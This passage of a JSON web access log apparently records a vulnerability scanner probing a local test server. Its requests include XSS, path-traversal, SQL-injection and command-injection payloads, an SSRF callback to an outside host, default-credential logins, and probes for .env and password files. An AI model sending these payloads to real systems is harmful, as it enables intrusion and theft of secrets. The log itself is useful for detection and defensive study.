HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.193","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my.ppk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/page_start.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\x22onmouseover=alert(document.domain)/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.example HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.194","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.189","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/kv/297Mdi3a7uJpJQ26RwC4Qq75fiI HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/kv/297Mdi3a7uJpJQ26RwC4Qq75fiI?raw HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wwwctrl.cgi?action=home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfwrepo.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /emswebclient/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.www HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hp/device/DeviceInformation/View HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/initializers/secret_token.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sm/ess.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.191","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wp/v2/posts HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.002","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shindig/gadgets/proxy?container=default&url=http://oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/80 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.196","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /network-login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.192","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.127.0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lfm.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"login=admin&pwd=admin&lang=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /op/op.Login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:25 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", 